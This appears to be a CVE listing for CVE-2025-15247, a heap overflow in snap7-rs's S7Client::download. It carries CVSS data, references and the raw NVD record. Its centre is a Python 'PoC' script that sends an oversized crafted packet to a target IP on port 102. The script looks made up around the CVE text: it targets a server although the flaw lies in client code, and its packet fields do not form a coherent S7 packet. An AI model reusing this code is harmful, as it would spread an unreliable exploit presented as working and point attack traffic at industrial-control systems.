CVE-2025-15247

Description

A vulnerability was identified in gmg137 snap7-rs up to 153d3e8c16decd7271e2a5b2e3da4d6f68589424. Affected by this issue is the function snap7_rs::client::S7Client::download of the file client.rs. Such manipulation leads to heap-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:gmg137:snap7-rs:-:*:*:*:*:*:*:* - VULNERABLE

snap7-rs <= 153d3e8c16decd7271e2a5b2e3da4d6f68589424

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

def create_exploit_packet():
    """
    PoC for CVE-2025-15247: snap7-rs heap buffer overflow
    in S7Client::download function
    """
    # Snap7 protocol header
    header = bytearray()
    header += b'\x03\x00'  # Magic bytes
    header += struct.pack('>H', 0x1F)  # Packet length placeholder
    header += b'\x01'  # Protocol type
    header += b'\x00'  # Reserved
    header += struct.pack('>H', 0x0001)  # ROSCTR: Job
    
    # PDU reference
    header += struct.pack('>H', 0x0000)
    # Parameters length
    header += struct.pack('>H', 0x0008)
    # Data length
    data_length = 0xFFFF  # Malicious oversized length
    header += struct.pack('>H', data_length)
    
    # Function code for download
    header += b'\x05'  # Function: Download
    
    # Function parameters
    params = bytearray()
    params += b'\x12'  # Parameter type
    params += b'\x08'  # Number of blocks
    params += struct.pack('>I', 0x41414141)  # Malicious length value
    
    # Malicious payload to trigger overflow
    payload = b'A' * 0x1000  # Oversized data
    
    packet = header + params + payload
    
    # Update packet length
    struct.pack_into('>H', packet, 2, len(packet))
    
    return bytes(packet)

def exploit(target_ip, target_port=102):
    """
    Send exploit packet to target Snap7 server
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((target_ip, target_port))
        exploit_packet = create_exploit_packet()
        sock.send(exploit_packet)
        response = sock.recv(1024)
        return response
    except Exception as e:
        return str(e)
    finally:
        sock.close()

if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with target IP
    result = exploit(target)
    print(f"Response: {result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15247
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15247
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15247/
[4] VulDB https://vuldb.com/cve/CVE-2025-15247
[5] https://gitee.com/gmg137/snap7-rs/
[6] https://gitee.com/gmg137/snap7-rs/issues/ID2H7V
[7] https://vuldb.com/?ctiid.338637
[8] https://vuldb.com/?id.338637

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15247", "sourceIdentifier": "[email protected]", "published": "2025-12-30T12:15:45.110", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in gmg137 snap7-rs up to 153d3e8c16decd7271e2a5b2e3da4d6f68589424. Affected by this issue is the function snap7_rs::client::S7Client::download of the file client.rs. Such manipulation leads to heap-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gmg137:snap7-rs:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6178571-BEA9-4BB3-8097-FCB3E7831866"}]}]}], "references": [{"url": "https://gitee.com/gmg137/snap7-rs/", "source": "[email protected]"}, {"url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H7V", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.338637", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338637", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}